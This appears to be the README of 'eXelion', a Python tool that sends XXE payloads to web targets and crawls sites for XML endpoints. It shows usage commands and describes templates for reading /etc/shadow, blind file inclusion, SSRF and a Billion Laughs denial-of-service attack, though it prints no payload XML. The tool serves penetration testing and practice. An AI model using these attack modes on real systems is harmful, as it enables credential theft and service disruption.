__ __ _ _
\ \ / / | | (_)
___ \ V / ___ | | _ ___ _ __
/ _ \ > < / _ \ | | | | / _ \ | '_ \
| __/ / . \ | __/ | | | | | (_) | | | | |
\___| /_/ \_\ \___| |_| |_| \___/ |_| |_|
Version: 0.5
Author: K3res
Github: https://github.com/K3res/
Check it Out!: https://github.com/B0lg0r0v/
eXeleion is a simple tool designed to inject XXE payloads and display the results directly in the terminal.
It can also be used to crawl your target URL and search for all XML data interactions.
Additionally, you can customize your request headers and body to send to your URL and observe the response.
🔧 This tool is still a work in progress, and changes may be implemented as development continues
The tool will always show your request and response for your target
For the following options -he, -b, -x, -c you must use the single qutoes '' to customs your Header and Body/XXE Payload
python3 eXelion.py -he 'header: header' -b 'Body is there' -u http://google.com
Use the -st option to display all available templates. Subsequently, you can customize variables such as the protocol and paths.
python3 eXelion.py -xlfi -vfp '/tmp/test.txt' -vp 'htpp'
To search for XML interactions, use the -cr option. Additionally, you can view all URLs identified without XML interactions by using the -crv option.
Note: The duration may vary depending on performance and network connection.
python3 eXelion.py -crv -u https://0a2a006c04b11c5881400c75008b0050.web-security-academy.net/
usage: eXelion.py [options]
Tools for XXE/XEE Payloads
options:
-h, --help show this help message and exit
Request options:
-u URL, --url URL The URL target http://example.com/XML
-he HEADERS, --headers HEADERS
Use custom headers
-c COOKIE, --cookie COOKIE
Use custom cookie
-b BODY, --body BODY Use custom body
-x XXE, --xxe XXE Use custom XXE payload
-xf XXEFILE, --xxefile XXEFILE
Use custom XML file with XXE payload
Special options:
-cr, --crawlex search on the website for XML interactions
-crv, --crawlexverbose
display all crawled URLs, even if no XML was found
-t, --time give the finish time back
-drh, --disableResponseHeader
Disable the display of the response header
-drb, --disableResponseBody
Disable the display of the response body
Templates options:
-st, --showTemplates show all availible templates
-xfd, --xxeFileDisclosure
Use a XXE template to read a file (default value= /etc/shadow)
-xebl, --xeeBillionLaughs
Use the Billion laughs template(DoS attack)
-xlfi, --xxeLocalFileInclusion
Use a XXE template to read a file (default value= /etc/shadow, with LFI)
-xblfi, --xxeBlindLocalFileInclusion
Use a XXE template to read a file (default value= /etc/shadow, with Blind LFI)
-xacb, --xxeAccessControlBypass
Use a XXE bypass to read a PHP file
-xs, --xxeSSRF Use a XXE template with a SSRF
Variable Templates Options:
-vfp VARIABLEFILEPATH, --variableFilePath VARIABLEFILEPATH
Variable to change the file path with the file path
-ve VARIABLEENTITY, --variableEntity VARIABLEENTITY
Variable to change the entity name
-vp VARIABLEPROTOCOL, --variableProtocol VARIABLEPROTOCOL
Varaible to change the protocol type
-vsu VARIABLESSRF, --variableSSRF VARIABLESSRF
Varaible to change the URL for SSRF attacks
-vulfi VARIABLEURLLFI, --variableUrlLFI VARIABLEURLLFI
Varaible to change the URL for LFI attacks
📤 Customize your own request.
📑 Input your own XXE payloads or load an XML file containing your payloads.
📝 Use and customize the XXE templates.
🔎 Search a website for XML interactions.
⚙️ Pip install features
⚙️ Improve tool performance
⚙️ Function to use a wordlist for the variables in templates
⚙️ Function to Create a SVG data with XXE Payload
⚙️ Interactive Function to create you own XXE Payload
⚙️ Function to create a extern dtd data
⚙️ Function for XML injection
⚙️ Function for XPATH Injection
Install eXelion:
git clone https://github.com/K3res/eXelion.git
cd eXelion/corex
pip3 install -r requirements.txt
Check out B0lg0r0v's GitHub site for interesting tools like Elyzer or Elixier.
This project, including the hacking tool, was developed solely to enhance my coding skills. Users of this tool are fully responsible for any consequences arising from its use.